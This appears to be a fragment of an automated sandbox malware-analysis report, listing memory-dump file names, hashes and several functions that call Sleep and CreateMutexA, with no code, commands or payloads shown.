Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 293d0b781373d399612048b01d5eff91e2fe0bba2f1bf601c9407671144850a4
Instruction ID: bbf7f56ba7ed6ff2c02d8104cb7679c079896a8deccda477f3402415eeddef9b
Opcode Fuzzy Hash: 293d0b781373d399612048b01d5eff91e2fe0bba2f1bf601c9407671144850a4
Instruction Fuzzy Hash: F5312831714200DBEB189B7CDD8CBEDB6629F86310F24863CE114AB6D5DB7599818752

Function 000BA348 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 746e1c3087c715aa5e530f9423d55667bc9b77aa5e9a415dee1c45ac6afd1fac
Instruction ID: 7850ce7299965e7537b710de4e0d463d30aa24bfd1b41c9518deb99fdc16562c
Opcode Fuzzy Hash: 746e1c3087c715aa5e530f9423d55667bc9b77aa5e9a415dee1c45ac6afd1fac
Instruction Fuzzy Hash: 7A3179317102009BEB18AB78DD8C7EDB7A29FC6310F24823CF114AB6D6DBB599C18752

Function 000BA47D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 03b921b1f477652ce244aeda6ee1840e83122d8a5926e10bb7979dcfee201b9c
Instruction ID: e224d4ac9db7166384dba4dbd0e97ab3db6d9659501663a49a0ee1562493da1f
Opcode Fuzzy Hash: 03b921b1f477652ce244aeda6ee1840e83122d8a5926e10bb7979dcfee201b9c
Instruction Fuzzy Hash: 3A3188317102009BEB18DB78DD8CBEDBB629FC6314F208328E014AB6D6DBB599818752

Function 000BA5B2 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ef1332c97e055b3993031b80bc8c4a60a401f163118acc1a96448fe5aeefee7d
Instruction ID: 28b6af8f6d1fbb5e56f760051b2926900191693247c034272ec24e5cb0e120c5
Opcode Fuzzy Hash: ef1332c97e055b3993031b80bc8c4a60a401f163118acc1a96448fe5aeefee7d
Instruction Fuzzy Hash: 263159717102409BEB18DB78DD8CBEDB762DF8A310F24822CE014AB7D6DB7599818792

Function 000B9A0C Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ae0c4e28f5141201a6ae2aa6beb75243c7e2dc6d6fd91a813ea647c8e30922fa
Instruction ID: 13a332d833d4c6e72ba4d9ac783a420cdf5434506d0a71272650842370e151c5
Opcode Fuzzy Hash: ae0c4e28f5141201a6ae2aa6beb75243c7e2dc6d6fd91a813ea647c8e30922fa
Instruction Fuzzy Hash: D22179317142009BEB18AF28DD8D7ECB6A2EF86310F20433DE5149BAD5DF7599818792

Function 000BA27F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
